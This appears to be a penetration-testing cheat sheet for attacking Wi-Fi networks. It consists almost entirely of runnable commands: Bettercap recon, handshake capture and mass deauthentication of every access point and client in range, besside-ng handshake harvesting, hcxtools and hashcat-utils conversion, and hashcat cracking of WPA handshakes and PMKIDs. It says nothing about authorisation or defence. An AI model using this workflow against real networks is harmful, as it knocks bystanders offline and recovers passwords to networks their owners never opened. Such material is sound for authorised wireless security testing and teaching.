Wifi reconnaissance and attacks
===============================

[[_TOC_]]

#### Requirements
wireless-tools and libnetfilter-queue1

    apt install wireless-tools libnetfilter-queue1

[Bettercap](https://github.com/bettercap/bettercap)
===================================================

##### Acquire wifi networks in range
    bettercap -iface <iface> -eval 'set events.stream.output bettercap-events.log;
        set wifi.handshakes.file bettercap-wifi-handshakes.pcap;
        set ticker.period 3;
        set ticker.commands "clear; wifi.show";
        wifi.recon on;
        ticker on;
        events.ignore wifi.client.probe;
        events.on wifi.client.handshake ticker off;'

##### Watch specific AP-BSSID for passive WPA handshake capture

    wifi.recon.channel <channel>
    wifi.recon <ap-bssid>

##### Target specific AP-BSSID for deauthentication

    wifi.deauth <ap-bssid>

##### Target specific CLIENT-BSSID for deauthentication

    wifi.deauth <client-bssid>

##### Target all AP-BSSIDs in range

    wifi.deauth all

##### Acquire PMKID from specific AP-BSSID

    wifi.assoc <bssid>

##### Acquire PMKIDs from all AP-BSSIDs in range

    bettercap -iface <iface> -eval 'set wifi.handshakes.file bettercap-wifi-handshakes.pcap; wifi.recon on; sleep 10; wifi.assoc all'

besside-ng (aircrack-ng)
========================

##### Harvest WEP/WPA handshakes

    besside-ng <iface> -vv

##### Harvest WPA only

    besside-ng -W <iface> -vv

##### Target WPA only and specific AP-BSSID

    besside-ng -W <iface> -b 00:11:22:33:44:55 -vv

PMKID and WPA handshakes
========================

#### Requirements
##### [hcxtools](https://github.com/ZerBea/hcxtools)

    git clone https://github.com/ZerBea/hcxtools && cd hcxtools && make

##### [hashcat-utils](https://github.com/hashcat/hashcat-utils)

    git clone https://github.com/hashcat/hashcat-utils && cd hashcat-utils/src && make

##### Extract PMKIDs

    ./hcxpcaptool -z /path/to/wifi-handshakes-output.pmkid /path/to/bettercap-wifi-handshakes.pcap

##### Convert WPA handshake to hashcat hccapx format

    ./cap2hccapx.bin /path/to/wpa.cap /path/to/wpa-hashes-output.hccapx

Hashcat cracking
================

#### Requirements
##### [hashcat](https://github.com/hashcat/hashcat/releases/tag/v6.0.0)

##### Hashcat WPA handshake

    hashcat -m2500 -a0 -w3 /path/to/wpa-hashes-output.hccapx /path/to/wordlist.txt --force

##### Crack PMKID

    hashcat -m16800 -a0 -w3 /path/to/wifi-handshakes-output.pmkid /path/to/wordlist.txt --force

